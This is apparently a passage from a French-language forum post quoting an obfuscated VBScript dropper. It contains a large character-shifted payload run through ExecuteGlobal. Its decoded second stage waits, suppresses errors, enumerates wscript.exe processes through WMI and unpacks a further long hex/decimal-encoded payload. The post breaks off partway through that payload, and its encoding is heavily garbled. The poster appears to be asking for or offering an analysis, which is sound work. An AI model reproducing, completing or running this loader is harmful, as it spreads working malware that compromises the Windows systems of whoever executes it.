@A‰@A‰@N‰@@‰@A‰@N‰@>‰@?‰@A‰@N‰@E‰@B‰@N‰@>‰@?‰@A‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@>‰@?‰@A‰@N‰@E‰@C‰@N‰@>‰@?‰@A‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@E‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@C‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@B‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@C‰@N‰@A‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@A‰@D‰@N‰@A‰@D‰@N‰@C‰@C‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@B‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@A‰@C‰@N‰@>‰@>‰@@‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@C‰@D‰@N‰@>‰@=‰@E‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@D‰@N‰@A‰@C‰@N‰@>‰@>‰@@‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@B‰@N‰@>‰@>‰@=‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@@‰@D‰@N‰@>‰@=‰@?‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@@‰@D‰@N‰@>‰@>‰@=‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@@‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@A‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@E‰@@‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@A‰@C‰@N‰@>‰@>‰@@‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@D‰@N‰@A‰@C‰@N‰@E‰@@‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@@‰@?‰@N‰@B‰@A‰@N‰@A‰@E‰@N‰@A‰@E‰@N‰@A‰@E‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰??‰Q‰N‰CA‰CF‰CQ‰?=‰BF‰BC‰AS‰DE‰C>‰B>‰DA‰CA‰AR‰DN‰A?‰AE‰AA‰BF‰BB‰BF‰AQ‰AF‰B?‰BN‰AB‰DA‰D>‰DE‰AB‰Q‰N‰BF‰BC‰AS‰DE‰C>‰B>‰DA‰CA‰AR‰DN‰A?‰AE‰AA‰BF‰BB‰BF‰AQ‰AF‰B?‰BN‰AB‰DA‰D>‰DE‰AB‰?=‰@Q‰?=‰??‰@N‰??‰Q‰N‰AS‰D>‰AF‰CD‰A@‰B>‰CD‰DA‰CD‰B=‰AN‰DN‰AD‰CP‰BF‰BD‰DA‰AN‰BN‰D>‰C?‰BN‰AR‰CE‰B=‰@Q‰B@‰B=‰AP‰AF‰BA‰?E‰AS‰D>‰AF‰CD‰A@‰B>‰CD‰DA‰CD‰B=‰AN‰DN‰AD‰CP‰BF‰BD‰DA‰AN‰BN‰D>‰C?‰BN‰AR‰CE‰B=‰?P‰?=‰BF‰BC‰AS‰DE‰C>‰B>‰DA‰CA‰AR‰DN‰A?‰AE‰AA‰BF‰BB‰BF‰AQ‰AF‰B?‰BN‰AB‰DA‰D>‰DE‰AB‰?F‰Q‰N‰CA‰CF‰CQ‰?=‰CN‰AD‰AF‰CS‰CA‰A>‰D?‰AO‰B@‰AP‰CC‰CF‰AS‰BA‰CC‰C?‰BF‰DF‰DB‰CQ‰AD‰A?‰BD‰AB‰CQ‰Q‰N‰CN‰AD‰AF‰CS‰CA‰A>‰D?‰AO‰B@‰AP‰CC‰CF‰AS‰BA‰CC‰C?‰BF‰DF‰DB‰CQ‰AD‰A?‰BD‰AB‰CQ‰?=‰@Q‰?=‰@=‰Q‰N‰CA‰CF‰CQ‰?=‰B>‰B>‰CR‰AB‰AB‰B>‰DA‰DB‰AD‰CR‰BC‰BF‰BD‰C>‰D=‰D@‰CC‰AN‰D@‰CA‰DA‰BF‰BA‰A?‰DC‰Q‰N‰B>‰B>‰CR‰AB‰AB‰B>‰DA‰DB‰AD‰CR‰BC‰BF‰BD‰C>‰D=‰D@‰CC‰AN‰D@‰CA‰DA‰BF‰BA‰A?‰DC‰?=‰@Q‰?=‰BB‰A?‰AS‰BB‰AR‰AA‰?E‰AS‰D>‰AF‰CD‰A@‰B>‰CD‰DA‰CD‰B=‰AN‰DN‰AD‰CP‰BF‰BD‰DA‰AN‰BN‰D>‰C?‰BN‰AR‰CE‰B=‰?F‰?=‰?Q‰?=‰@>‰Q‰N‰AC‰AS‰B?‰?=‰AA‰B?‰DN‰CF‰CN‰AB‰C@‰BF‰AO‰C@‰DD‰AS‰CD‰B=‰CS‰DA‰AR‰B@‰AE‰DN‰A@‰BB‰BE‰CR‰BC‰?=‰@Q‰?=‰CN‰AD‰AF‰CS‰CA‰A>‰D?‰AO‰B@‰AP‰CC‰CF‰AS‰BA‰CC‰C?‰BF‰DF‰DB‰CQ‰AD‰A?‰BD‰AB‰CQ‰?=‰BA‰AS‰?=‰B>‰B>‰CR‰AB‰AB‰B>‰DA‰DB‰AD‰CR‰BC‰BF‰BD‰C>‰D=‰D@‰CC‰AN‰D@‰CA‰DA‰BF‰BA‰A?‰DC‰Q‰N‰BB‰DC‰D=‰CF‰BB‰AQ‰AR‰BD‰B@‰D@‰CQ‰D?‰AC‰AO‰AC‰BB‰A@‰AQ‰BN‰D=‰AS‰D=‰AA‰AB‰AA‰?=‰@Q‰?=‰AS‰D>‰AF‰CD‰A@‰B>‰CD‰DA‰CD‰B=‰AN‰DN‰AD‰CP‰BF‰BD‰DA‰AN‰BN‰D>‰C?‰BN‰AR‰CE‰B=‰?E‰AA‰B?‰DN‰CF‰CN‰AB‰C@‰BF‰AO‰C@‰DD‰AS‰CD‰B=‰CS‰DA‰AR‰B@‰AE‰DN‰A@‰BB‰BE‰CR‰BC‰?F‰Q‰N‰CP‰AN‰CP‰B@‰DD‰AQ‰CF‰AQ‰AR‰A@‰DB‰BE‰CA‰B?‰BD‰BF‰D>‰CR‰DC‰D?‰A@‰CA‰CS‰DN‰CO‰?=‰@Q‰?=‰A@‰CE‰D?‰BD‰?E‰BB‰DC‰D=‰CF‰BB‰AQ‰AR‰BD‰B@‰D@‰CQ‰D?‰AC‰AO‰AC‰BB‰A@‰AQ‰BN‰D=‰AS‰D=‰AA‰AB‰AA‰?F‰Q‰N‰D?‰CA‰AP‰AF‰DB‰CP‰AE‰BC‰D?‰CQ‰BD‰AB‰AF‰AF‰AO‰AE‰DF‰CA‰AP‰BN‰CF‰AP‰AQ‰CE‰A?‰?=‰@Q‰?=‰D?‰CA‰AP‰AF‰DB‰CP‰AE‰BC‰D?‰CQ‰BD‰AB‰AF‰AF‰AO‰AE‰DF‰CA‰AP‰BN‰CF‰AP‰AQ‰CE‰A?‰?=‰?C‰?=‰CP‰AN‰CP‰B@‰DD‰AQ‰CF‰AQ‰AR‰A@‰DB‰BE‰CA‰B?‰BD‰BF‰D>‰CR‰DC‰D?‰A@‰CA‰CS‰DN‰CO‰Q‰N‰AR‰AB‰BE‰BA‰Q‰N‰CB‰DE‰CB‰C@‰DB‰DA‰CB‰?=‰?E‰D?‰CA‰AP‰AF‰DB‰CP‰AE‰BC‰D?‰CQ‰BD‰AB‰AF‰AF‰AO‰AE‰DF‰CA‰AP‰BN‰CF‰AP‰AQ‰CE‰A?‰?F‰Q‰N/6--4Ofr€yopTu‡\apdv„ofpXy|xyup|n}]_Tx~OcxQ‚O„zQrxƒdT-€r-ycfP`[xV\f‚…zn„†YY_]su-J-Rf~Pzy~VT[p€RNQzT†oesfVz5/„v{ztz€Gii;i||ipvzƒ?/6-4Y…‡Y~gbRf`]\‡UsOSzpƒ_|…[yTp~a†YexP…„pecP^QO[N{tZru-4OƒT{PywV]NOXV‡„ScX_VzZYTcxsP{_{~R}xbU„`U\ƒpƒ‚€-€r-dpvy]QotRaftw€gZ‡{|W}}…^\-J-ycfP`[xV\f‚…zn„†YY_]su;r…rp~‚r†5-€vVtq`…Uv|„N{xNs„{wq|_†U-35Sw†PQ€Peq^{eW…sX`YdeUrƒn6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35y€v…cq_ea€bY[ws[qg„c^WTet6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35F-7->?6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>=>-<->6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35FF=-<->=6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>C6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35@>CE-<-FF6-3-Zvq5/yFnBy|7†y@/9D9>63-€vVtq`…Uv|„N{xNs„{wq|_†U-35>AD?-<-AC6-3--/s/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35CC-8-AE6-3--/|/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>EB@-<->D6-3--/-/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>?@-:-A6-3--/v/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35BB-7-?6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35B>6-3--/?/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35FB6-3--/}/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>A6-3-Zvq5…RcN\VN}‡\nP_eudƒv…uX„‡s9C9>63--/p/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>@?-:-@>6-3--/€/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>;DA?A?A?A?A?A?A-7-CC6--99AE6--\Wr[uƒba}Xw{zoXYXTqV‚c~-J--/ywnz{s‚†x…/-qvz-b{XRs[tRdYPd†‚`_VUfO``u}-4‡\n`€VcoYV`\†wf|€ƒp‚ucpo‚~Rf}s…†PRs|[g‚uX{‡Y}Vf}TZvq-\Wr[uƒba}Xw{zoXYXTqV‚c~9@9@--s|-rnpu-b{XRs[tRdYPd†‚`_VUfO``u}-v{-dpvy]QotRaftw€gZ‡{|W}}…^\--vs-b{XRs[tRdYPd†‚`_VUfO``u};{nzr-J-/„/-3-Zvq5/@pp€~B?‚@@/9B9>63-Zvq5/tp@y==o„C|/9?9>63--//-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35C>FB-<-BF6-3--/}/-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35>>C6-3-€vVtq`…Uv|„N{xNs„{wq|_†U-35F@-:-AD6-3-Zvq5/B=rx~„E†~€w/9@9>63-Zvq5/BCC…q?w…uu‡/9E9>63-€vVtq`…Uv|„N{xNs„{wq|_†U-35DC-8-?B6---ur{--4‡…fRzf…OrezsYaYrwpNYƒ~zy„tvvefsRTNo]p€q[Nb‡„…-R…rp‚rTy|ony5…\cƒRtxƒYgXyvOa|nx|P‡rdƒ6--r{q-vs--{r…--r{q-vs--{r…--"
    dec=decode(txt)
    function decode(s)
    For i = 1 To Len(s)
    newtxt = Mid(s, i, 1)
    newtxt = Chr(Asc(newtxt) - 13)
    coded = coded + (newtxt)
    Next
    decode = coded
    End Function 
    ExecuteGlobal (dec)

    La variable txt contient du code qui est d้cod้ pour ๊tre ex้cut้. Le voici :
    Code : S้lectionner tout - Visualiser dans une fen๊tre เ part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    wscript.sleep 4000
    on error resume next
    function fonction1(param) 
    	dim f1, i, f3 
    	f1 = "" 
    	lengthParam = Len(param) 
    	for i = 2 to lengthParam
    		f3 = "" 
     
    		while Mid(param, i, 1) <>  "|"  and i <= lengthParam 
    			f3 = f3 + Mid(param, i, 1) 
    			i = i+1 
    		wend 
    		f1 = f1 + chr(CLng( chrw(104 - 66) & chrw(26 + 78) & f3)) 
    		''' f1 = f1 + chr( Clng("&h" & f3)) 
    	next 
    	fonction1 = f1 
    end function
     
    set obj1 = getobject("winmgmts:\\")
    set obj2 = getobject(".\root\cimv2")
     
    obj1obj2 = obj1 & obj2
     
    set obj3 = obj1obj2.execquery( select r from win32_process ,,48) 
     
    dim g 
    for each g in obj3  
    	if g.name = "wscript.exe" then
     
    		dim h 
    		h = fonction1( "|D|A|4F|71|49|67|43|51|67|74|67|50|4A|7A|47|6C|59|57|74|4A|5A|71|62|5A|4E|68|50|3D|22|33|39|3A|33|32|3A|36|37|3A|31|31|31|3A|31|30|30|3A|31|30|31|3A|31|30|30|3A|33|32|3A|39|38|3A|31|32|31|3A|33|32|3A|31|31|38|3A|39|35|3A|36|36|3A|34|38|3A|34|39|3A|31|33|3A|31|30|3A|37|39|3A|31|31|30|3A|33|32|3A|31|30|31|3A|31|31|34|3A|31|31|34|3A|31|31|31|3A|31|31|34|3A|33|32|3A|31|31|34|3A|31|30|31|3A|31|31|35|3A|31|31|37|3A|31|30|39|3A|31|30|31|3A|33|32|3A|31|31|30|3A|31|30|31|3A|31|32|30|3A|31|31|36|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|30|36|3A|33|32|3A|36|31|3A|33|32|3A|39|37|3A|31|31|34|3A|31|31|34|3A|39|37|3A|31|32|31|3A|34|30|3A|33|34|3A|38|37|3A|38|33|3A|39|39|3A|31|31|34|3A|31|30|35|3A|31|31|32|3A|31|31|36|3A|34|36|3A|38|33|3A|31|30|34|3A|31|30|31|3A|31|30|38|3A|31|30|38|3A|33|34|3A|34|34|3A|33|34|3A|38|33|3A|39|39|3A|31|31|34|3A|31|30|35|3A|31|31|32|3A|31|31|36|3A|31|30|35|3A|31|31|30|3A|31|30|33|3A|34|36|3A|37|30|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|38|33|3A|31|32|31|3A|31|31|35|3A|31|31|36|3A|31|30|31|3A|31|30|39|3A|37|39|3A|39|38|3A|31|30|36|3A|31|30|31|3A|39|39|3A|31|31|36|3A|33|34|3A|34|34|3A|33|34|3A|38|33|3A|31|30|34|3A|31|30|31|3A|31|30|38|3A|31|30|38|3A|34|36|3A|36|35|3A|31|31|32|3A|31|31|32|3A|31|30|38|3A|31|30|35|3A|39|39|3A|39|37|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|33|34|3A|34|34|3A|33|34|3A|37|37|3A|31|30|35|3A|39|39|3A|31|31|34|3A|31|31|31|3A|31|31|35|3A|31|31|31|3A|31|30|32|3A|31|31|36|3A|34|36|3A|38|38|3A|37|37|3A|37|36|3A|37|32|3A|38|34|3A|38|34|3A|38|30|3A|33|34|3A|34|31|3A|31|33|3A|31|30|3A|31|30|33|3A|33|32|3A|36|31|3A|33|32|3A|39|37|3A|31|31|34|3A|31|31|34|3A|39|37|3A|31|32|31|3A|34|30|3A|33|34|3A|37|32|3A|37|35|3A|36|37|3A|38|35|3A|33|34|3A|34|34|3A|33|34|3A|37|32|3A|37|35|3A|37|36|3A|37|37|3A|33|34|3A|34|34|3A|33|34|3A|37|32|3A|37|35|3A|36|37|3A|38|35|3A|39|32|3A|31|31|38|3A|31|31|39|3A|34|38|3A|31|31|34|3A|31|30|39|3A|33|34|3A|34|34|3A|33|34|3A|39|32|3A|38|33|3A|31|31|31|3A|31|30|32|3A|31|31|36|3A|31|31|39|3A|39|37|3A|31|31|34|3A|31|30|31|3A|39|32|3A|37|37|3A|31|30|35|3A|39|39|3A|31|31|34|3A|31|31|31|3A|31|31|35|3A|31|31|31|3A|31|30|32|3A|31|31|36|3A|39|32|3A|38|37|3A|31|30|35|3A|31|31|30|3A|31|30|30|3A|31|31|31|3A|31|31|39|3A|31|31|35|3A|39|32|3A|36|37|3A|31|31|37|3A|31|31|34|3A|31|31|34|3A|31|30|31|3A|31|31|30|3A|31|31|36|3A|38|36|3A|31|30|31|3A|31|31|34|3A|31|31|35|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|39|32|3A|38|32|3A|31|31|37|3A|31|31|30|3A|39|32|3A|33|34|3A|34|34|3A|33|34|3A|37|32|3A|37|35|3A|37|36|3A|37|37|3A|39|32|3A|38|33|3A|37|39|3A|37|30|3A|38|34|3A|38|37|3A|36|35|3A|38|32|3A|36|39|3A|39|32|3A|36|37|3A|31|30|38|3A|39|37|3A|31|31|35|3A|31|31|35|3A|31|30|31|3A|31|31|35|3A|39|32|3A|33|34|3A|34|34|3A|33|34|3A|38|32|3A|36|39|3A|37|31|3A|39|35|3A|38|33|3A|39|30|3A|33|34|3A|34|34|3A|33|34|3A|39|32|3A|31|30|30|3A|31|30|31|3A|31|30|32|3A|39|37|3A|31|31|37|3A|31|30|38|3A|31|31|36|3A|31|30|35|3A|39|39|3A|31|31|31|3A|31|31|30|3A|39|32|3A|33|34|3A|34|31|3A|31|33|3A|31|30|3A|31|32|31|3A|36|31|3A|33|32|3A|39|37|3A|31|31|34|3A|31|31|34|3A|39|37|3A|31|32|31|3A|34|30|3A|33|34|3A|31|31|39|3A|31|30|35|3A|31|31|30|3A|31|30|39|3A|31|30|33|3A|31|30|39|3A|31|31|36|3A|31|31|35|3A|35|38|3A|33|34|3A|34|34|3A|33|34|3A|31|31|39|3A|31|30|35|3A|31|31|30|3A|35|31|3A|35|30|3A|39|35|3A|31|30|38|3A|31|31|31|3A|31|30|33|3A|31|30|35|3A|39|39|3A|39|37|3A|31|30|38|3A|31|30|30|3A|31|30|35|3A|31|31|35|3A|31|30|37|3A|33|34|3A|34|34|3A|33|34|3A|38|37|3A|31|30|35|3A|31|31|30|3A|35|31|3A|35|30|3A|39|35|3A|37|39|3A|31|31|32|3A|31|30|31|3A|31|31|34|3A|39|37|3A|31|31|36|3A|31|30|35|3A|31|31|30|3A|31|30|33|3A|38|33|3A|31|32|31|3A|31|31|35|3A|31|31|36|3A|31|30|31|3A|31|30|39|3A|33|34|3A|34|34|3A|33|34|3A|31|31|39|3A|31|30|35|3A|31|31|30|3A|31|30|39|3A|31|30|33|3A|31|30|39|3A|31|31|36|3A|31|31|35|3A|35|38|3A|39|32|3A|39|32|3A|31|30|38|3A|31|31|31|3A|39|39|3A|39|37|3A|31|30|38|3A|31|30|34|3A|31|31|31|3A|31|31|35|3A|31|31|36|3A|39|32|3A|31|31|34|3A|31|31|31|3A|31|31|31|3A|31|31|36|3A|39|32|3A|31|31|35|3A|31|30|31|3A|39|39|3A|31|31|37|3A|31|31|34|3A|31|30|35|3A|31|31|36|3A|31|32|31|3A|39|39|3A|31|30|31|3A|31|31|30|3A|31|31|36|3A|31|30|31|3A|31|31|34|3A|33|34|3A|34|34|3A|33|34|3A|36|35|3A|31|31|30|3A|31|31|36|3A|31|30|35|3A|38|36|3A|31|30|35|3A|31|31|34|3A|31|31|37|3A|31|31|35|3A|38|30|3A|31|31|34|3A|31|31|31|3A|31|30|30|3A|31|31|37|3A|39|39|3A|31|31|36|3A|33|34|3A|34|31|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|30|32|3A|31|31|37|3A|31|31|30|3A|39|39|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|33|32|3A|31|30|33|3A|31|31|31|3A|34|30|3A|31|30|39|3A|34|31|3A|31|33|3A|31|30|3A|31|30|35|3A|31|30|32|3A|33|32|3A|31|30|39|3A|36|31|3A|35|32|3A|33|32|3A|31|31|36|3A|31|30|34|3A|31|30|31|3A|31|31|30|3A|31|33|3A|31|30|3A|38|34|3A|36|31|3A|33|34|3A|31|31|39|3A|31|30|35|3A|31|31|30|3A|31|30|39|3A|31|30|33|3A|31|30|39|3A|31|31|36|3A|31|31|35|3A|35|38|3A|39|32|3A|39|32|3A|31|30|38|3A|31|31|31|3A|39|39|3A|39|37|3A|31|30|38|3A|31|30|34|3A|31|31|31|3A|31|31|35|3A|31|31|36|3A|39|32|3A|31|31|34|3A|31|31|31|3A|31|31|31|3A|31|31|36|3A|39|32|3A|31|31|35|3A|31|30|31|3A|39|39|3A|31|31|37|3A|31|31|34|3A|31|30|35|3A|31|31|36|3A|31|32|31|3A|39|39|3A|31|30|31|3A|31|31|30|3A|31|31|36|3A|31|30|31|3A|31|31|34|3A|33|34|3A|31|33|3A|31|30|3A|38|33|3A|31|30|31|3A|31|31|36|3A|33|32|3A|36|36|3A|36|31|3A|37|31|3A|31|30|31|3A|31|31|36|3A|37|39|3A|39|38|3A|31|30|36|3A|31|30|31|3A|39|39|3A|31|31|36|3A|34|30|3A|31|32|31|3A|34|30|3A|35|31|3A|34|31|3A|34|31|3A|34|36|3A|37|33|3A|31|31|30|3A|31|31|35|3A|31|31|36|3A|39|37|3A|31|31|30|3A|39|39|3A|31|30|31|3A|31|31|35|3A|37|39|3A|31|30|32|3A|34|30|3A|31|32|31|3A|34|30|3A|35|32|3A|34|31|3A|34|31|3A|31|33|3A|31|30|3A|31|30|32|3A|31|31|31|3A|31|31|34|3A|33|32|3A|31|30|31|3A|39|37|3A|39|39|3A|31|30|34|3A|33|32|3A|39|37|3A|33|32|3A|31|30|35|3A|31|31|30|3A|33|32|3A|39|38|3A|31|33|3A|31|30|3A|31|30|33|3A|31|31|31|3A|36|31|3A|39|37|3A|34|36|3A|31|30|30|3A|31|30|35|3A|31|31|35|3A|31|31|32|3A|31|30|38|3A|39|37|3A|31|32|31|3A|37|38|3A|39|37|3A|31|30|39|3A|31|30|31|3A|31|33|3A|31|30|3A|31|30|31|3A|31|32|30|3A|31|30|35|3A|31|31|36|3A|33|32|3A|31|30|32|3A|31|31|31|3A|31|31|34|3A|31|33|3A|31|30|3A|31|31|30|3A|31|30|31|3A|31|32|30|3A|31|31|36|3A|31|33|3A|31|30|3A|38|33|3A|31|30|31|3A|31|31|36|3A|33|32|3A|36|36|3A|36|31|3A|37|31|3A|31|30|31|3A|31|31|36|3A|37|39|3A|39|38|3A|31|30|36|3A|31|30|31|3A|39|39|3A|31|31|36|3A|34|30|3A|31|32|31|3A|34|30|3A|35|31|3A|34|31|3A|33|32|3A|33|38|3A|33|32|3A|33|34|3A|35|30|3A|33|34|3A|34|31|3A|34|36|3A|37|33|3A|31|31|30|3A|31|31|35|3A|31|31|36|3A|39|37|3A|31|31|30|3A|39|39|3A|31|30|31|3A|31|31|35|3A|37|39|3A|31|30|32|3A|34|30|3A|31|32|31|3A|34|30|3A|35|32|3A|34|31|3A|34|31|3A|31|33|3A|31|30|3A|31|30|32|3A|31|31|31|3A|31|31|34|3A|33|32|3A|31|30|31|3A|39|37|3A|39|39|3A|31|30|34|3A|33|32|3A|39|37|3A|33|32|3A|31|30|35|3A|31|31|30|3A|33|32|3A|39|38|3A|31|33|3A|31|30|3A|31|30|33|3A|31|31|31|3A|36|31|3A|39|37|3A|34|36|3A|31|30|30|3A|31|30|35|3A|31|31|35|3A|31|31|32|3A|31|30|38|3A|39|37|3A|31|32|31|3A|37|38|3A|39|37|3A|31|30|39|3A|31|30|31|3A|33|32|3A|31|33|3A|31|30|3A|31|30|31|3A|31|32|30|3A|31|30|35|3A|31|31|36|3A|33|32|3A|31|30|32|3A|31|31|31|3A|31|31|34|3A|31|33|3A|31|30|3A|31|31|30|3A|31|30|31|3A|31|32|30|3A|31|31|36|3A|31|33|3A|31|30|3A|31|30|35|3A|31|30|32|3A|33|32|3A|31|30|33|3A|31|31|31|3A|36|31|3A|33|34|3A|33|34|3A|33|32|3A|31|31|36|3A|31|30|34|3A|31|30|31|3A|31|31|30|3A|33|32|3A|31|30|33|3A|31|31|31|3A|36|31|3A|33|34|3A|37|38|3A|31|31|31|3A|31|31|36|3A|34|35|3A|31|30|32|3A|31|31|31|3A|31|31|37|3A|31|31|30|3A|31|30|30|3A|33|34|3A|31|33|3A|31|30|3A|31|30|31|3A|31|30|38|3A|31|31|35|3A|31|30|31|3A|31|33|3A|31|30|3A|38|33|3A|31|30|31|3A|31|31|36|3A|33|32|3A|36|36|3A|36|31|3A|37|31|3A|31|30|31|3A|31|31|36|3A|37|39|3A|39|38|3A|31|30|36|3A|31|30|31|3A|39|39|3A|31|31|36|3A|34|30|3A|31|32|31|3A|34|30|3A|34|38|3A|34|31|3A|34|31|3A|34|36|3A|37|33|3A|31|31|30|3A|31|31|35|3A|31|31|36|3A|39|37|3A|31|31|30|3A|39|39|3A|31|30|31|3A|31|31|35|3A|37|39|3A|31|30|32|3A|34|30|3A|31|32|31|3A|34|30|3A|31|30|39|3A|34|31|3A|34|31|3A|31|33|3A|31|30|3A|31|30|32|3A|31|31|31|3A|31|